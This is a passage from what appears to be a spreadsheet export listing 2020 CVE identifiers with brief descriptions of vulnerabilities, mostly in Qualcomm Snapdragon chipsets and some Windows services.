    <t>u'Integer overflow to buffer overflow occurs while playback of ASF clip having unexpected number of codec entries' in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables in APQ8009, APQ8009W, APQ8017, APQ8037, APQ8053, APQ8064AU, APQ8096, APQ8096AU, APQ8096SG, APQ8098, MDM9206, MDM9650, MSM8905, MSM8909, MSM8909W, MSM8917, MSM8920, MSM8937, MSM8940, MSM8953, MSM8996, MSM8996AU, MSM8996SG, MSM8998, QCM4290, QCM6125, QCS405, QCS410, QCS4290, QCS603, QCS605, QCS610, QCS6125, QM215, SA6145P, SA6150P, SA6155, SA6155P, SA8150P, SA8155, SA8155P, SA8195P, SDA429W, SDA640, SDA660, SDA670, SDA845, SDM429, SDM429W, SDM439, SDM450, SDM455, SDM630, SDM632, SDM636, SDM640, SDM660, SDM670, SDM710, SDM830, SDM845, SDW2500, SDX20, SDX20M, SDX50M, SDX55, SDX55M, SM4125, SM4250, SM4250P, SM6115, SM6115P, SM6125, SM6150, SM6150P, SM6250, SM6250P, SM6350, SM7125, SM7150, SM7150P, SM7225, SM7250, SM7250P, SM8150, SM8150P, SM8250, SXR1120, SXR1130, SXR2130, SXR2130P, WCD9330</t>
  </si>
  <si>
    <t>CVE-2020-11197</t>
  </si>
  <si>
    <t>Possible integer overflow can occur when stream info update is called when total number of streams detected are zero while parsing TS clip with invalid data in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-11198</t>
  </si>
  <si>
    <t>Key material used for TZ diag buffer encryption and other data related to log buffer is not wiped securely due to improper usage of memset in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11199</t>
  </si>
  <si>
    <t>HLOS to access EL3 stack canary by just mapping imem region due to Improper access control and can lead to information exposure in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-1120</t>
  </si>
  <si>
    <t>A denial of service vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations, aka 'Connected User Experiences and Telemetry Service Denial of Service Vulnerability'. This CVE ID is unique from CVE-2020-1244.</t>
  </si>
  <si>
    <t>CVE-2020-11200</t>
  </si>
  <si>
    <t>Buffer over-read while parsing RPS due to lack of check of input validation on values received from user side. in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2020-11201</t>
  </si>
  <si>
    <t>Arbitrary access to DSP memory due to improper check in loaded library for data received from CPU side' in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile in QCM6125, QCS410, QCS603, QCS605, QCS610, QCS6125, SA6145P, SA6155, SA6155P, SA8155, SA8155P, SDA640, SDA845, SDM640, SDM830, SDM845, SDX50M, SDX55, SDX55M, SM6125, SM6150, SM6250, SM6250P, SM7125, SM7150, SM7150P, SM8150, SM8150P</t>
  </si>
  <si>
    <t>CVE-2020-11202</t>
  </si>
  <si>
    <t>Buffer overflow/underflow occurs when typecasting the buffer passed by CPU internally in the library which is not aligned with the actual size of the structure' in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile in QCM6125, QCS410, QCS603, QCS605, QCS610, QCS6125, SA6145P, SA6155, SA6155P, SA8155, SA8155P, SDA640, SDA670, SDA845, SDM640, SDM670, SDM710, SDM830, SDM845, SDX50M, SDX55, SDX55M, SM6125, SM6150, SM6150P, SM6250, SM6250P, SM7125, SM7150, SM7150P, SM8150, SM8150P</t>
  </si>
  <si>
    <t>CVE-2020-11203</t>
  </si>
  <si>
    <t>Stack overflow may occur if GSM/WCDMA broadcast config size received from user is larger than variable length array in Snapdragon Auto, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-11204</t>
  </si>
  <si>
    <t>Possible memory corruption and information leakage in sub-system due to lack of check for validity and boundary compliance for parameters that are read from shared MSG RAM in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11205</t>
  </si>
  <si>
    <t>u'Possible integer overflow to heap overflow while processing command due to lack of check of packet length received' in Snapdragon Auto, Snapdragon Compute, Snapdragon Mobile in QSM8350, SA6145P, SA6150P, SA6155, SA6155P, SA8150P, SA8155P, SA8195P, SDX55M, SM8250, SM8350, SM8350P, SXR2130, SXR2130P</t>
  </si>
  <si>
    <t>CVE-2020-11206</t>
  </si>
  <si>
    <t>Possible buffer overflow in Fastrpc while handling received parameters due to lack of validation on input parameters' in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile in APQ8098, MSM8998, QCM4290, QCM6125, QCS410, QCS4290, QCS610, QCS6125, QSM8250, QSM8350, SA6145P, SA6150P, SA6155, SA6155P, SA8150P, SA8155, SA8155P, SA8195P, SC7180, SDA640, SDA660, SDA845, SDA855, SDM640, SDM660, SDM830, SDM845, SDM850, SDX50M, SDX55, SDX55M, SM4250, SM4250P, SM6115, SM6115P, SM6125, SM6150, SM6150P, SM6250, SM6250P, SM6350, SM7125, SM7150, SM7150P, SM7225, SM7250, SM7250P, SM8150, SM8150P, SM8250, SM8350, SM8350P, SXR2130, SXR2130P</t>
  </si>
  <si>
    <t>CVE-2020-11207</t>
  </si>
  <si>
    <t>Buffer overflow in LibFastCV library due to improper size checks with respect to buffer length' in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile in APQ8052, APQ8056, APQ8076, APQ8096, APQ8096SG, APQ8098, MDM9655, MSM8952, MSM8956, MSM8976, MSM8976SG, MSM8996, MSM8996SG, MSM8998, QCM4290, QCM6125, QCS410, QCS4290, QCS610, QCS6125, QSM8250, SA6145P, SA6150P, SA6155, SA6155P, SA8150P, SA8155, SA8155P, SA8195P, SC7180, SDA640, SDA660, SDA845, SDA855, SDM640, SDM660, SDM830, SDM845, SDM850, SDX50M, SDX55, SDX55M, SM4250, SM4250P, SM6115, SM6115P, SM6125, SM6150, SM6150P, SM6250, SM6250P, SM6350, SM7125, SM7150, SM7150P, SM7225, SM7250, SM7250P, SM8150, SM8150P, SM8250, SXR2130, SXR2130P</t>
  </si>
  <si>
    <t>CVE-2020-11208</t>
  </si>
  <si>
    <t>Out of Bound issue in DSP services while processing received arguments due to improper validation of length received as an argument' in SD820, SD821, SD820, QCS603, QCS605, SDA855, SA6155P, SA6145P, SA6155, SA6155P, SD855, SD 675, SD660, SD429, SD439</t>
  </si>
  <si>
    <t>CVE-2020-11209</t>
  </si>
  <si>
    <t>Improper authorization in DSP process could allow unauthorized users to downgrade the library versions in SD820, SD821, SD820, QCS603, QCS605, SDA855, SA6155P, SA6145P, SA6155, SA6155P, SD855, SD 675, SD660, SD429, SD439</t>
  </si>
  <si>
    <t>CVE-2020-1121</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when Windows improperly handles calls to Clipboard Service, aka 'Windows Clipboard Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1111, CVE-2020-1165, CVE-2020-1166.</t>
  </si>
  <si>
    <t>CVE-2020-11210</t>
  </si>
  <si>
    <t>Possible memory corruption in RPM region due to improper XPU configuration in Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11212</t>
  </si>
  <si>
    <t>Out of bounds reads while parsing NAN beacons attributes and OUIs due to improper length of field check in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11213</t>
  </si>
  <si>
    <t>Out of bound reads might occur in while processing Service descriptor due to improper validation of length of fields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t>
  </si>
  <si>
    <t>CVE-2020-11214</t>
  </si>
  <si>
    <t>Buffer over-read while processing NDL attribute if attribute length is larger than expected and then FW is treating it as more number of immutable schedules in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11215</t>
  </si>
  <si>
    <t>An out of bounds read can happen when processing VSA attribute due to improper minimum required length check in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11216</t>
  </si>
  <si>
    <t>Buffer over read can happen in video driver when playing clip with atomsize having value UINT32_MAX in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-11217</t>
  </si>
  <si>
    <t>A possible double free or invalid memory access in audio driver while reading Speaker Protection parameters in Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2020-11218</t>
  </si>
  <si>
    <t>Denial of service in baseband when NW configures LTE betaOffset-RI-Index due to lack of data validation in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2020-1122</t>
  </si>
  <si>
    <t>CVE-2020-11220</t>
  </si>
  <si>
    <t>While processing storage SCM commands there is a time of check or time of use window where a pointer used could be invalid at a specific time while executing the storage SCM call in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11221</t>
  </si>
  <si>
    <t>Usage of syscall by non-secure entity can allow extraction of secure QTEE diagnostic information in clear text form due to insufficient checks in the syscall handler and leads to information disclosure in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11222</t>
  </si>
  <si>
    <t>Buffer over read while processing MT SMS with maximum length due to improper length check in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2020-11223</t>
  </si>
  <si>
    <t>Out of bound in camera driver due to lack of check of validation of array index before copying into array in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-11225</t>
  </si>
  <si>
    <t>Out of bound access in WLAN driver due to lack of validation of array length before copying into array in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11226</t>
  </si>
  <si>
    <t>Out of bound memory read in Data modem while unpacking data due to lack of offset length check in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-11227</t>
  </si>
  <si>
    <t>Out of bound write while parsing RTT/TTY packet parsing due to lack of check of buffer size before copying into buffer in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-11228</t>
  </si>
  <si>
    <t>Part of RPM region was not protected from xblSec itself due to improper policy and leads to unprivileged access in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-1123</t>
  </si>
  <si>
    <t>A denial of service vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations, aka 'Connected User Experiences and Telemetry Service Denial of Service Vulnerability'. This CVE ID is unique from CVE-2020-1084.</t>
  </si>
  <si>
    <t>CVE-2020-11230</t>
  </si>
  <si>
    <t>Potential arbitrary memory corruption when the qseecom driver updates ion physical addresses in the buffer as it exposes a physical address to user land in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2020-11231</t>
  </si>
  <si>
    <t>Two threads call one or both functions concurrently leading to corruption of pointers and reference counters which in turn can lead to heap corruption in Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2020-11233</t>
  </si>
  <si>
    <t>Time-of-check time-of-use race condition While processing partition entries due to newly created buffer was read again from mmc without validation in Snapdragon Auto, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-11234</t>
  </si>
  <si>
    <t>When sending a socket event message to a user application, invalid information will be passed if socket is freed by other thread resulting in a Use After Free condition in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-11235</t>
  </si>
  <si>
    <t>Buffer overflow might occur while parsing unified command due to lack of check of input data received in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11236</t>
  </si>
  <si>
    <t>Memory corruption due to invalid value of total dimension in the non-histogram type KPI could lead to a denial of service in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2020-11237</t>
  </si>
  <si>
    <t>Memory crash when accessing histogram type KPI input received due to lack of check of histogram definition before accessing it in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2020-11238</t>
  </si>
  <si>
    <t>Possible Buffer over-read in ARP/NS parsing due to lack of check of packet length received in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11239</t>
  </si>
  <si>
    <t>Use after free issue when importing a DMA buffer by using the CPU address of the buffer due to attachment is not cleaned up properly in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-1124</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1131, CVE-2020-1134, CVE-2020-1144, CVE-2020-1184, CVE-2020-1185, CVE-2020-1186, CVE-2020-1187, CVE-2020-1188, CVE-2020-1189, CVE-2020-1190, CVE-2020-1191.</t>
  </si>
  <si>
    <t>CVE-2020-11240</t>
  </si>
  <si>
    <t>Memory corruption due to ioctl command size was incorrectly set to the size of a pointer and not enough storage is allocated for the copy of the user argument in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-11241</t>
  </si>
  <si>
    <t>Out of bound read will happen if EAPOL Key length is less than expected while processing NAN shared key descriptor attribute in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11242</t>
  </si>
  <si>
    <t>User could gain access to secure memory due to incorrect argument into address range validation api used in SDI to capture requested contents in Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2020-11243</t>
  </si>
  <si>
    <t>RRC sends a connection establishment success to NAS even though connection setup validation returns failure and leads to denial of service in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2020-11245</t>
  </si>
  <si>
    <t>Unintended reads and writes by NS EL2 in access control driver due to lack of check of input validation in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11246</t>
  </si>
  <si>
    <t>A double free condition can occur when the device moves to suspend mode during secure playback in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2020-11247</t>
  </si>
  <si>
    <t>Out of bound memory read while unpacking data due to lack of offset length check in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-1125</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1077, CVE-2020-1086, CVE-2020-1090, CVE-2020-1139, CVE-2020-1149, CVE-2020-1151, CVE-2020-1155, CVE-2020-1156, CVE-2020-1157, CVE-2020-1158, CVE-2020-1164.</t>
  </si>
  <si>
    <t>CVE-2020-11250</t>
  </si>
  <si>
    <t>Use after free due to race condition when reopening the device driver repeatedly in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11251</t>
  </si>
  <si>
    <t>Out-of-bounds read vulnerability while accessing DTMF payload due to lack of check of buffer length before copying in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-11252</t>
  </si>
  <si>
    <t>Trustzone initialization code will disable xPU`s when memory dumps are enabled and lead to information disclosure in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N</t>
  </si>
  <si>
    <t>CVE-2020-11253</t>
  </si>
  <si>
    <t>Arbitrary memory write issue in video driver while setting the internal buffers in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2020-11254</t>
  </si>
  <si>
    <t>Memory corruption during buffer allocation due to dereferencing session ctx pointer without checking if pointer is valid in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2020-11255</t>
  </si>
  <si>
    <t>Denial of service while processing RTCP packets containing multiple SDES reports due to memory for last SDES packet is freed and rest of the memory is leaked in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-11256</t>
  </si>
  <si>
    <t>Memory corruption due to lack of check of validation of pointer to buffer passed to trustzone in Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11257</t>
  </si>
  <si>
    <t>Memory corruption due to lack of validation of pointer arguments passed to TrustZone BSP in Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11258</t>
  </si>
  <si>
    <t>Memory corruption due to lack of validation of pointer arguments passed to Trustzone BSP in Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11259</t>
  </si>
  <si>
    <t>CVE-2020-1126</t>
  </si>
  <si>
    <t>A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory, aka 'Media Foundation Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1028, CVE-2020-1136, CVE-2020-1150.</t>
  </si>
  <si>
    <t>CVE-2020-11260</t>
  </si>
  <si>
    <t>An improper free of uninitialized memory can occur in DIAG services in Snapdragon Compute, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2020-11261</t>
  </si>
  <si>
    <t>Memory corruption due to improper check to return error when user application requests memory allocation of a huge size in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-11262</t>
  </si>
  <si>
    <t>A race between command submission and destroying the context can cause an invalid context being added to the list leads to use after free issue. in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-11263</t>
  </si>
  <si>
    <t>An integer overflow due to improper check performed after the address and size passed are aligned in Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11264</t>
  </si>
  <si>
    <t>Improper authentication of Non-EAPOL/WAPI plaintext frames during four-way handshake can lead to arbitrary network packet injection in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music</t>
  </si>
  <si>
    <t>CVE-2020-11265</t>
  </si>
  <si>
    <t>Information disclosure issue due to lack of validation of pointer arguments passed to TZ BSP in Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11266</t>
  </si>
  <si>
    <t>Image address is dereferenced before validating its range which can cause potential QSEE information leakage in Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11267</t>
  </si>
  <si>
    <t>Stack out-of-bounds write occurs while setting up a cipher device if the provided IV length exceeds the max limit value in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11268</t>
  </si>
  <si>
    <t>Potential UE reset while decoding a crafted Sib1 or SIB1 that schedules unsupported SIBs and can lead to denial of service in Snapdragon Auto, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2020-11269</t>
  </si>
  <si>
    <t>Possible memory corruption while processing EAPOL frames due to lack of validation of key length before using it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t>
  </si>
  <si>
    <t>CVE-2020-11270</t>
  </si>
  <si>
    <t>Possible denial of service due to RTT responder consistently rejects all FTMR by transmitting FTM1 with failure status in the FTM parameter IE in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11271</t>
  </si>
  <si>
    <t>Possible out of bounds while accessing global control elements due to race condition in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11272</t>
  </si>
  <si>
    <t>Before enqueuing a frame to the PE queue for further processing, an entry in a hash table can be deleted and using a stale version later can lead to use after free condition in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-11273</t>
  </si>
  <si>
    <t>Histogram type KPI was teardown with the assumption of the existence of histogram binning info and will lead to null pointer access when histogram binning info is missing due to lack of null check in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2020-11274</t>
  </si>
  <si>
    <t>Denial of service in MODEM due to assert to the invalid configuration in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2020-11275</t>
  </si>
  <si>
    <t>Possible buffer over-read while parsing quiet IE in Rx beacon frame due to improper check of IE length in received beacon in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11276</t>
  </si>
  <si>
    <t>Possible buffer over read while processing P2P IE and NOA attribute of beacon and probe response frames due to improper validation of P2P IE and NOA attribute lengths in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11277</t>
  </si>
  <si>
    <t>Possible race condition during async fastrpc session after sending RPC message due to the fastrpc ctx gets free during async session in Snapdragon Compute, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2020-11278</t>
  </si>
  <si>
    <t>Possible denial of service while handling host WMI command due to improper validation in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11279</t>
  </si>
  <si>
    <t>Memory corruption while processing crafted SDES packets due to improper length check in sdes packets recieved in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2020-11280</t>
  </si>
  <si>
